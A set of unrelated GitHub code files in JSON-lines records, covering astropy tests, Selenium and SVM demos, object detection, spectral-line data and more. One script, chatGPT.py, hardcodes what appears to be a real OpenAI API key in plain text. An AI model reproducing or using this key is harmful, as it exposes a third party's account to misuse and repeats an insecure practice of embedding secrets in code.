[True, False, True, False, False, True])\n\n\ndef test_invalid_type():\n config = {\"verify\": \"exception\"}\n with pytest.raises(exceptions.E06):\n field = tree.Field(None, name=\"c\", datatype=\"foobar\", config=config)\n converters.get_converter(field, config=config)\n\n\ndef test_precision():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(None, name=\"c\", datatype=\"float\", precision=\"E4\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.output(266.248, False) == \"266.2\"\n\n field = tree.Field(None, name=\"c\", datatype=\"float\", precision=\"F4\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.output(266.248, False) == \"266.2480\"\n\n\ndef test_integer_overflow():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(None, name=\"c\", datatype=\"int\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.W51):\n c.parse(\"-2208988800\", config=config)\n\n\ndef test_float_default_precision():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(None, name=\"c\", datatype=\"float\", arraysize=\"4\", config=config)\n c = converters.get_converter(field, config=config)\n assert (\n c.output([1, 2, 3, 8.9990234375], [False, False, False, False])\n == \"1 2 3 8.9990234375\"\n )\n\n\ndef test_vararray():\n votable = tree.VOTableFile()\n resource = tree.Resource()\n votable.resources.append(resource)\n table = tree.TableElement(votable)\n resource.tables.append(table)\n\n tabarr = []\n heads = [\"headA\", \"headB\", \"headC\"]\n types = [\"char\", \"double\", \"int\"]\n\n vals = [[\"A\", 1.0, 2], [\"B\", 2.0, 3], [\"C\", 3.0, 4]]\n for i in range(len(heads)):\n tabarr.append(\n tree.Field(votable, name=heads[i], datatype=types[i], arraysize=\"*\")\n )\n\n table.fields.extend(tabarr)\n table.create_arrays(len(vals))\n for i in range(len(vals)):\n values = tuple(vals[i])\n table.array[i] = values\n buff = io.BytesIO()\n 
votable.to_xml(buff)\n\n\ndef test_gemini_v1_2():\n \"\"\"\n see Pull Request 4782 or Issue 4781 for details.\n \"\"\"\n table = parse_single_table(get_pkg_data_filename(\"data/gemini.xml\"))\n assert table is not None\n\n tt = table.to_table()\n assert (\n tt[\"access_url\"][0]\n == \"http://www.cadc-ccda.hia-iha.nrc-cnrc.gc.ca/data/pub/GEMINI/\"\n \"S20120515S0064?runid=bx9b1o8cvk1qesrt\"\n )\n","repo_name":"astropy/astropy","sub_path":"astropy/io/votable/tests/test_converter.py","file_name":"test_converter.py","file_ext":"py","file_size_in_byte":10561,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"70470502454","text":"from dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Optional, Dict, List\n\nimport yaml\nfrom pydantic import BaseModel\n\n\nclass RewardActionType(str, Enum):\n KEYPRESS = 'keypress'\n\n\n@dataclass\nclass RewardAction:\n type: RewardActionType\n value: str\n\n @staticmethod\n def from_dict(as_dict: dict) -> 'RewardAction':\n return RewardAction(\n type=RewardActionType(as_dict.get('type')),\n value=as_dict.get('value')\n )\n\n # Should be called \"__dict__\" but that confused the PyCharm debugger and\n # makes it impossible to inspect any instance variables\n # https://youtrack.jetbrains.com/issue/PY-43955\n def to_dict(self) -> dict:\n return {\n 'type': self.type.value,\n 'value': self.value\n }\n\n\n@dataclass\nclass RewardConfig:\n id: Optional[str]\n title: str\n cost: int\n actions: Dict[str, RewardAction]\n\n @staticmethod\n def from_dict(as_dict: dict) -> 'RewardConfig':\n return RewardConfig(\n id=as_dict.get('id'),\n title=as_dict.get('title'),\n cost=as_dict.get('cost'),\n actions={\n key: RewardAction.from_dict(action_dict)\n for (key, action_dict) in as_dict.get('actions', dict()).items()\n }\n )\n\n def to_dict(self) -> dict:\n return {\n 'id': self.id,\n 'title': self.title,\n 'cost': self.cost,\n 'actions': {\n key: action.to_dict() for (key, action) in self.actions.items()\n }\n }\n\n\n@dataclass\nclass ClientConfig:\n log_level: str\n auto_fulfill: bool\n refund: bool\n rewards: List[RewardConfig]\n\n @staticmethod\n def from_dict(as_dict: dict) -> 'ClientConfig':\n return ClientConfig(\n log_level=as_dict.get('logLevel', 'info').upper(),\n auto_fulfill=as_dict.get('autoFulfill', False),\n refund=as_dict.get('refund', False),\n rewards=[\n RewardConfig.from_dict(r) for r in as_dict.get('rewards', list())\n ]\n )\n\n def to_dict(self) -> dict:\n return {\n 'logLevel': self.log_level.lower(),\n 'autoFulfill': self.auto_fulfill,\n 'refund': self.refund,\n 'rewards': [\n reward.to_dict() for reward in self.rewards\n ]\n }\n\n\nclass TokenFromUrlDTO(BaseModel):\n url: str\n\n\nclass YamlDumper(yaml.Dumper):\n \"\"\"\n From: https://stackoverflow.com/a/39681672\n \"\"\"\n def increase_indent(self, flow=False, indentless=False):\n return super(YamlDumper, self).increase_indent(flow, False)\n","repo_name":"cetteup/0xQWERTY-client","sub_path":"src/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4806586632","text":"# Author:zqbin\n# @Time:2023/10/8 16:15\n# @Author:14988\n# @Site:\n# @File:demo11.py\n# @Software:PyCharm\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\ndriver = 
webdriver.Chrome()\ndriver.implicitly_wait(20)\ndriver.get('https://www.baidu.com')\ndriver.maximize_window()\n\naction = ActionChains(driver)\nelement = driver.find_element(By.CSS_SELECTOR, \".title-content-title\")\n\nprint('textElement.text=', element.text)\ndriver.find_element(By.CSS_SELECTOR, '#kw').send_keys('美食')\ntime.sleep(2)\ndriver.find_element(By.CSS_SELECTOR, '#kw').clear()\n\nsearchButton = driver.find_element(value=\"su\")\nprint(searchButton.size)\nprint(searchButton.location)\nprint(searchButton.rect)\n\ninput()\n\ntime.sleep(5)\ndriver.close()\ndriver.quit()\n","repo_name":"FoXM999/ceniu","sub_path":"p96/ui_day01/demo11.py","file_name":"demo11.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"780885962","text":"import Solve\n#import random\nclass PublicKey:\n p = 1\n alpha = 1\n beta = 1\nclass PrivateKey:\n a = 1\nclass Doc:\n x = 1\npublicKey = PublicKey()\nprivateKey = PrivateKey()\ndoc = Doc()\ndef init():\n print(\"------Value initialization------\")\n p = int(input(\"enter the prime number p:\"))\n while (not (Solve.isPrime(p))) and (not (Solve.isPrime((p-1)/2))) :\n p = int(input(\"re-enter the prime number p:\"))\n publicKey.p = p\n\n g = Solve.primRoots(p)[0]\n publicKey.alpha = g*g\n a = int(input(\"enter the number a with 1 <= a <= (p-1)/2: \"))\n privateKey.a = a\n publicKey.beta = Solve.powerMode(publicKey.alpha, privateKey.a, publicKey.p)\n\n print(\"public key: K(p, alpha, beta) : K(\" + str(publicKey.p) + \", \" + str(publicKey.alpha) + \", \" + str(publicKey.beta) + \")\")\n print(\"secret key aK(a) : K(\" + str(privateKey.a) + \")\")\n x = int(input(\"enter text x:\"))\n doc.x = x\n","repo_name":"KiritiVelivela/undeniable_signature","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28394155511","text":"import csv\nimport json\nfrom shapely.geometry.polygon import Polygon as ShapelyPolygon\nfrom shapely.geometry import shape\n\n\ndef get_addresses():\n file_path = './BOSTON_MASTER.csv'\n with open(file_path) as csvfile:\n addresses = []\n readCSV = csv.reader(csvfile, delimiter=',')\n for index, row in enumerate(readCSV):\n if index > 0:\n address = row[0]\n addresses.append(address)\n return addresses\n\nclass Polygon:\n def __init__(self, sub_district, unique_code, coordinates, polygon_type):\n self.sub_district = sub_district\n self.unique_code = unique_code\n self.coordinates = coordinates\n self.type = polygon_type\n\n def to_shapely_polygon(self) -> ShapelyPolygon:\n return shape({\n 'type': self.type,\n 'coordinates': self.coordinates\n })\n \n def _adjust_coordinate(coordinate):\n return tuple(coordinate)\n\n\ndef get_polygons() -> list[Polygon]:\n with open('./BOSTON_SUBDISTRICTS.geojson') as geojson:\n data = json.load(geojson)\n polygons = []\n for feature in data[\"features\"]:\n polygons.append(Polygon(\n feature['properties']['Zone_Desc'],\n feature['properties']['Unique_Code'],\n feature['geometry']['coordinates'],\n feature['geometry']['type']\n ))\n return polygons\n \n\n \n","repo_name":"IkeyBenz/frastai","sub_path":"get_addresses.py","file_name":"get_addresses.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16026471724","text":"# 연속합 2, G5, DP\n\nfrom sys import stdin\n\nn = 
int(stdin.readline())\narr = list(map(int, stdin.readline().split()))\n\ndp = [[0] * n for _ in range(2)] # dp[0][i] = max subarray sum with no element removed, dp[1][i] = max subarray sum with one element removed\ndp[0][0] = arr[0]\ndp[1][0] = -1000\n\nfor i in range(1, n):\n    dp[0][i] = max(dp[0][i-1] + arr[i], arr[i]) # extend the previous sum, or start fresh from arr[i] (when the previous sum is negative)\n    dp[1][i] = max(dp[0][i-1], dp[1][i-1] + arr[i]) # remove the current element, or keep extending the removed-once sum\n\ntmp1, tmp2 = max(dp[0]), max(dp[1])\nprint(max(tmp1, tmp2))\n\n\n","repo_name":"lookinmin/CodingTest","sub_path":"DP/BOJ_13398.py","file_name":"BOJ_13398.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23196803737","text":"#!/usr/bin/python\n\n\"\"\" \n    This is the code to accompany the Lesson 2 (SVM) mini-project.\n\n    Use a SVM to identify emails from the Enron corpus by their authors: \n    Sara has label 0\n    Chris has label 1\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\n\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n\n##linear\n#########################################################\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score\n\nclflin = svm.SVC(kernel='linear')\n\n#features_train = features_train[:len(features_train)/100] \n#labels_train = labels_train[:len(labels_train)/100] \n\nt0 = time()\nclflin.fit(features_train, labels_train)\nprint (\"training time with SVM's linear kernel\", time()-t0)\n\nt1 = time()\npredlin = clflin.predict(features_test)\nprint (\"prediction time with SVM's linear kernel\", time()-t1)\n\nprint(accuracy_score(labels_test, predlin))\n\n##rbf - radial basis function\n#########################################################\nclfrbf = svm.SVC(kernel='rbf', C=10000)\n\nt0 = time()\nclfrbf.fit(features_train, labels_train)\nprint (\"training time with SVM's rbf kernel\", time()-t0)\n\nt1 = time()\npredrbf = clfrbf.predict(features_test)\nprint (\"prediction time with SVM's rbf kernel\", time()-t1)\n\nprint(accuracy_score(labels_test, predrbf))\n\nprint(len(predrbf[predrbf == 1]))\n\n\n","repo_name":"sharad-vm/ML-Enron-Data","sub_path":"SVM/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4204376244","text":"import argparse\nimport torch\nimport numpy as np\nfrom utils import load_model_and_tokenizer\nfrom figures import create_bigram_histogram, create_position_boxplot\nfrom storage import get_summaries\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description=\"Script to produce Replication Figures 1 and 2\"\n    )\n\n    parser.add_argument(\n        \"--model\",\n        type=str,\n        required=True,\n        choices=[\n            \"pegasus-cnn_dailymail\",\n            \"pegasus-xsum\",\n            \"bart-large-cnn\",\n            \"bart-large-xsum\",\n        ],\n        help=\"choose the model\",\n    )\n\n    args = parser.parse_args()\n\n    model, tokenizer = load_model_and_tokenizer(args.model)\n\n    summaries = get_summaries(args.model, model.config.name_or_path)\n\n    # Existing Bigram means the bigram just generated occurs in the input document,\n    # while a NovelBigram is an organic model generation.\n    bigram_entropies = {\"existing\": [], 
\"novel\": []}\n # Prediction entropy values by relative sentence positions.\n # For example, 0.0 indicates the first 10% of tokens in a sentence, and 0.9 is the last 10% of tokens.\n position_entropies = {key: [] for key in np.round(np.linspace(0, 0.9, 10), 1)}\n\n for key, value in summaries.items():\n entropies = value[\"metadata\"][\"entropy\"]\n bigram_source = value[\"metadata\"][\"bigrams_in_input\"]\n sentence_position = value[\"metadata\"][\"sentence_position\"]\n for ind, e in enumerate(entropies):\n if bigram_source[ind]:\n bigram_entropies[\"existing\"].append(e)\n else:\n bigram_entropies[\"novel\"].append(e)\n position_entropies[sentence_position[ind]].append(e)\n\n create_bigram_histogram(bigram_entropies, args.model)\n create_position_boxplot(position_entropies, args.model)\n","repo_name":"vincehartman38/Replication-of-Transformer-Uncertainty","sub_path":"entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"620478401","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 8 15:23:15 2023\n\n@author: sebas\n\"\"\"\n\n\n \n \nimport openai\n\nopenai.api_key = \"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\"\n\n\nwhile True:\n \n prompt = input(\"\\nIntroduce una pregunta: \")\n \n if prompt == \"exit\":\n break\n \n completion = openai.Completion.create(engine=\"text-davinci-003\",\n prompt = prompt,\n max_tokens=2048)\n \n print(completion.choices[0].text)","repo_name":"SebastianAlzate96/Enzimas","sub_path":"chatGPT.py","file_name":"chatGPT.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73393107891","text":"from rest_framework.test import APIRequestFactory\n\nfrom one.tests.tests.cases import FastTenantTestCase as TestCase\nfrom one.users.api.views import UserViewSet\nfrom one.users.models import User\nfrom tests.cases import FastTenantTestCase as TestCase\n\n\nclass TestUserViewSet(TestCase):\n def setUp(self):\n super().setUp() # required\n self.user = User.objects.create_user(username=\"test\", password=\"test\")\n self.api_rf = APIRequestFactory()\n\n def test_get_queryset(self):\n view = UserViewSet()\n request = self.api_rf.get(\"/fake-url/\")\n request.user = self.user\n\n view.request = request\n\n assert self.user in view.get_queryset()\n\n def test_me(self):\n view = UserViewSet()\n request = self.api_rf.get(\"/fake-url/\")\n request.user = self.user\n\n view.request = request\n\n response = view.me(request) # type: ignore\n\n assert response.data == {\n \"username\": self.user.username,\n \"url\": f\"http://testserver/api/users/{self.user.username}/\",\n \"name\": self.user.name,\n }\n","repo_name":"riso-tech/django-saas","sub_path":"one/users/tests/test_drf_views.py","file_name":"test_drf_views.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"30174566980","text":"import os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport numpy as np\nimport tensorflow as tf\nimport cv2\nfrom mir_help import *\nfrom utils import label_map_util\nfrom utils import visualization_utils as vis_util\n\n# Set video capture from 2nd webcam\ncap = cv2.VideoCapture(1)\n\n# Record webcam activity\ncodec = cv2.VideoWriter_fourcc('D','I','V','X')\nvideoFile = cv2.VideoWriter();\nsize = 
(int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),\n int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))\nvideoFile = cv2.VideoWriter();\nvideoFile.open('video.avi', codec, 10, size, 1)\n\nsys.path.append(\"..\")\n\n# Model trained with custom data\nMODEL_NAME = 'mir_graph'\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('training', 'object-detection.pbtxt')\nNUM_CLASSES = 23\n\n# Load a (frozen) Tensorflow model into memory.\ndetection_graph = tf.Graph()\n\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\n\n# Detection\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n while True:\n # Start Camera, while true, camera will run\n ret, image_np = cap.read()\n\n # Set height and width of webcam\n height = 720\n width = 1280\n\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n\n # Detection equivalent to predict, will return confidence scores, classes,\n # box dimensions (ymin, xmin, ymax, xmax) & num of detection\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n line_thickness=5)\n\n # Obtain classes and coordinates (xmin) as a list of tuples\n od_list = [[category_index.get(value).get('name'), boxes[0][index][1] * width] for index,\n value in enumerate(classes[0]) if scores[0, index] > 0.65]\n\n # Reorder the tuples by their xmin coordinates\n od_list_seq = sorted(od_list, key=lambda x:(-x[1], x[0]), reverse=True)\n\n # Return only the classes from the tuples\n od_list_co = [seq[0] for seq in od_list_seq]\n\n # Convert labels into math 
operators\n od_list_co = convop(od_list_co)\n\n # Combine intergers between operators\n co_num_list = combint(od_list_co)\n\n # Convert all numbers into floats if list contains a division\n exp_result = chkfl(co_num_list)\n\n # Solve math expression and return result\n result = getresult(co_num_list, exp_result)\n\n # Convert math expression and result into a string\n if str(result) == '...':\n obj = str(exp_result)\n else:\n obj = str(exp_result) + ' is ' + str(result)\n\n # Set font, print math expression and result\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(image_np, obj, (150, 1000), font, 3, (0, 0, 0), 0, cv2.LINE_AA)\n\n # Record Video\n videoFile.write(image_np)\n\n # Set camera resolution and create a break function by pressing 'q'\n cv2.imshow('object detection', cv2.resize(image_np, (width, height)))\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cap.release()\n videoFile.release()\n cv2.destroyAllWindows()\n break\n","repo_name":"stevenobadja/math_object_detection","sub_path":"mir.py","file_name":"mir.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"3111945727","text":"from View.Shared import SetUpWindow\nfrom Controller.Analysis import *\n\n\ndef ShowInfo(version, pes, refs, atoms, numTests, rank, showPosPlot, showPesPlot, numPoints):\n if numTests >= numPoints:\n numTests = '> {}'.format(numPoints)\n elif numTests == 0:\n numTests = 'not recorded.'\n imageHolders = []\n\n window = tk.Toplevel()\n SetUpWindow(window)\n\n # Title\n Label(window, text='Result #{num} for elements {elements} Potential energy = {energy} eV'.format(num=rank+1, elements=atoms, energy=version[1]),\n font=('Agency FB', 16), fg='white', bg='#222222').pack(pady=5)\n\n # Set up grid\n topGrid = Frame(window)\n SetColours(topGrid)\n sizex, sizey = 200, 170\n\n Label(topGrid, text='Geometric structure', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=0, padx='5')\n Label(topGrid, text='Rotated', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=1, padx='5')\n Label(topGrid, text='Positions tested', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=3, padx='5')\n\n # Show the structure.\n imageHolders.append(PhotoImage(file=\"Images/structure{num}.png\".format(num=rank)))\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(topGrid, width=sizex, height=sizey, bg=\"#222222\")\n canvas.grid(row=1, column=0, padx='5')\n canvas.create_image(sizex / 2, sizey / 2, image=thisImage)\n\n # Show the rotated structure.\n imageHolders.append(PhotoImage(file=\"Images/structure{num}rotated.png\".format(num=rank)))\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(topGrid, width=sizex, height=sizey, bg=\"#222222\")\n canvas.grid(row=1, column=1, padx='5')\n canvas.create_image(sizex / 2, sizey / 2, image=thisImage)\n\n # Show the stats for this version of the molecule.\n bestInfoBox = Text(topGrid, fg='#EEFFEE', bg=\"#222222\", width=\"20\", height=\"10\")\n bestInfoBox.grid(row=1, column=2, columnspan=1, padx='5')\n\n if showPosPlot is True:\n imageHolders.append(PhotoImage(file=\"Images/positions{num}.png\".format(num=rank)))\n else:\n imageHolders.append(PhotoImage(file=\"Images/noPlot0.png\"))\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(topGrid, width=sizex, height=sizey)\n canvas.grid(row=1, column=3, padx='5')\n canvas.create_image(sizex / 2, sizey / 2, image=thisImage)\n\n Label(topGrid, text='Configurations tested: 
{}\\n(limited to show max {})'.format(numTests, numPoints), fg='#EEFFEE', bg='#222222') \\\n .grid(row=1, column=4, columnspan=1, padx='5')\n\n topGrid.pack()\n\n GetBestInfo(rank, bestInfoBox)\n\n # Set up bottom grid\n bottomGrid = Frame(window)\n SetColours(bottomGrid)\n sizex, sizey = 400, 340\n\n Label(bottomGrid, text='Potential energy surfaces found', font=('Agency FB', 16), fg='#EEFFEE', bg='#222222') \\\n .grid(row=0, column=0, columnspan=4, padx='5')\n\n # Show info for the PES plot.\n pesInfoBox = Text(bottomGrid, fg='#EEFFEE', bg=\"#222222\", width=\"46\", height=\"18\")\n pesInfoBox.grid(row=1, column=0, columnspan=2, padx='5')\n\n if showPesPlot is True:\n pesData = np.array(pes)\n # Make a larger copy of the PES for a clearer view.\n SurfacePlot(pesData, refs, 3.5, rank)\n imageHolders.append(PhotoImage(file=\"Images/pes{num}.png\".format(num=rank)))\n SurfaceInfo(pesInfoBox)\n # Show a legend for the PES plot.\n legend = Text(bottomGrid, fg='#EEFFEE', bg=\"#222222\", width=\"6\", height=\"18\")\n legend.grid(row=1, column=3, columnspan=1, padx='5')\n bottomGrid.pack()\n SurfaceLegend(legend, refs)\n else:\n imageHolders.append(PhotoImage(file=\"Images/noPlot0.png\"))\n pesInfoBox.insert(END, \"Potential energy surface\\ndata not recorded.\")\n bottomGrid.pack()\n thisImage = imageHolders[-1]\n canvas = tk.Canvas(bottomGrid, width=sizex, height=sizey)\n canvas.grid(row=1, column=2, padx='5')\n canvas.create_image(sizex/2, sizey/2, image=thisImage)\n\n window.mainloop()\n","repo_name":"Sophie-Turner/GeOpt","sub_path":"Geopt/View/Info.py","file_name":"Info.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42409833017","text":"import random\nimport numpy as np\n\nfrom keras.utils import np_utils\n\n\ndef transform(X_train, y_train, X_val, y_val, nb_classes):\n if type(X_train) is list:\n c = list(zip(X_train, y_train))\n random.shuffle(c)\n X_train, y_train = zip(*c)\n\n c = list(zip(X_val, y_val))\n random.shuffle(c)\n X_val, y_val = zip(*c)\n\n elif type(X_train) is np.ndarray:\n indices = np.random.permutation(X_train.shape[0])\n X_train = X_train[indices]\n y_train = y_train[indices]\n\n indices = np.random.permutation(X_val.shape[0])\n X_val = X_val[indices]\n y_val = y_val[indices]\n\n # random.shuffle(X_train_source)\n # random.shuffle(X_val_source)\n\n # Convert class vectors to binary class matrices.\n Y_train = np_utils.to_categorical(y_train, nb_classes)\n Y_val = np_utils.to_categorical(y_val, nb_classes)\n\n return X_train, Y_train, X_val, Y_val\n","repo_name":"qichenglao/DeepOrg","sub_path":"DeepOrg/helpers/data_transformer.py","file_name":"data_transformer.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27440886850","text":"from typing import Optional, Union\nimport numpy as np\nfrom scipy.stats import median_abs_deviation\nfrom scipy.signal import savgol_filter\nfrom scipy.signal import find_peaks_cwt\n\nfrom astropy.modeling import Fittable1DModel, Parameter\n\n# Some important lines with corresponding wavelenghts in Angstrom\nRESTFRAME_LINES = [\n (10320, '[SII]', 'E'),\n (8863.0, 'TiO', 'A'),\n (8430.0, 'TiO', 'A'),\n (8195.0, 'NaI', 'A'),\n (8183.0, 'NaI', 'A'),\n (7590.0, 'TiO', 'A'),\n (7065.2, 'HeI', 'AE'),\n (6725.0, '[SII]', 'E'),\n (6562.8, 'Halpha', 'AEB'),\n (6159.0, 'TiO', 'A'),\n (5892.5, 'NaD', 'A'),\n (5603.0, 'TiO', 'A'),\n (5269.0, 
'Ca,Fe', 'A'),\n (5175.4, 'MgI', 'A'),\n (5006.8, '[OIII]', 'E'),\n (4958.9, '[OIII]', 'E'),\n (4861.3, 'Hbeta', 'AEB'),\n (4340.4, 'Hgamma', 'AE'),\n (4304.4, 'Gband', 'A'),\n (4216.0, 'CN', 'A'),\n (4101.7, 'Hdelta', 'AE'),\n (4000.0, 'Balmer_Break', 'Break'),\n (4072.0, '[SII]', 'E'),\n (3968.5, 'CaII_H', 'A'),\n (3933.7, 'CaII_K', 'A'),\n (3889.1, 'Hksi,CN(H8)', 'AE'),\n (3869.0, '[NeIII]', 'E'),\n (3797.9, 'Hteta', 'AE'),\n (3770.6, 'H11', 'AE'),\n (3727.5, '[OII]', 'E'),\n (3581.0, 'FeI', 'A'),\n (3425.8, '[NeV]', 'E'),\n (3345.9, '[NeV]', 'E'),\n (2964.0, 'FeII_bump', 'E'),\n (2799.0, 'MgII', 'AEB'),\n (2626.0, 'FeII', 'E'),\n (2600.0, 'FeII', 'A'),\n (2586.7, 'FeII', 'A'),\n (2382.0, 'FeII', 'A'),\n (2374.0, 'FeII', 'A'),\n (2344.2, 'FeII', 'A'),\n (2260.0, 'FeII', 'A'),\n (2142.0, '[NII]', 'E'),\n (1909.0, '[CIII]', 'EB'),\n (1856.0, 'AlIII', 'A'),\n (1670.8, 'AlII', 'A'),\n (1666.1497, 'OIII]', 'E'),\n (1640.0, 'HeII', 'AE'),\n (1608.5, 'FeII', 'A'),\n (1660.8092, 'OIII]', 'E'),\n (1549.0, 'CIV', 'AEB'),\n (1526.7, 'SiII', 'A'),\n (1397.0, 'SiIV+OIV', 'AEB'),\n (1334.5, 'CII', 'AE'),\n (1303.0, 'OI', 'AE'),\n (1260.4, 'SiII', 'A'),\n (1240.0, 'NV', 'AE'),\n (1215.7, 'LyA', 'AEB'),\n (1033.0, 'OVI', 'AE'),\n (1025.6, 'LyB', 'AE'),\n (972.5, 'LyG', 'AE'),\n]\n\n\ndef _normal(x, mu, sigma):\n return np.exp(-((x - mu)**2)/(2*sigma)) / (sigma * np.sqrt(2 * np.pi))\n\n\nclass Emission1D(Fittable1DModel):\n \"\"\"Simple model for a flat spectrum with emission lines.\"\"\"\n\n redshift = Parameter()\n\n def __init__(self, lines_identifications, sigma=3, redshift=0, **kwargs):\n self.line_candidates = lines_identifications\n self.sigma = sigma\n super().__init__(redshift=redshift, **kwargs)\n\n def evaluate(self, lam, redshift):\n \"\"\"\n Evaluate the model.\n\n Parameters\n ----------\n lam : np.ndarray\n Array of wavelength.\n redshift : float, optional\n The redshift of the spectrum.\n The default value is 0.\n\n Returns\n -------\n result : np.ndarray\n The model values.\n\n \"\"\"\n result = np.zeros_like(lam)\n for candidate in self.line_candidates:\n mu = candidate[1] / (1 + redshift)\n result += _normal(lam, mu, self.sigma) * candidate[3]\n return result\n\n\ndef get_lines(name=None, line_type=None, wrange=None, z=0):\n \"\"\"\n Return line data according to the given line name and types.\n\n Parameters\n ----------\n name : str or None, optional\n The name of the line (eg. CaII_H or FeI, etc...). If None, the lines\n are selected only by type. If both name and type are None, all lines\n are returned.\n line_type : str or None, optional\n Type of the line, can be 'A' (absorption), 'E' (emission) 'B' (Broad).\n If None, then all the line types are returned.\n The default is None.\n wrange : tuple/list/np.ndarray of floats or None, optional\n The wavelength ragne in which lines should be. If None, no selection\n according to the line wavelenght is made.\n The default is None.\n z : float, optional\n The redshit of the lines. The default value is 0.\n\n Returns\n -------\n selected_lines : list\n List of line data. 
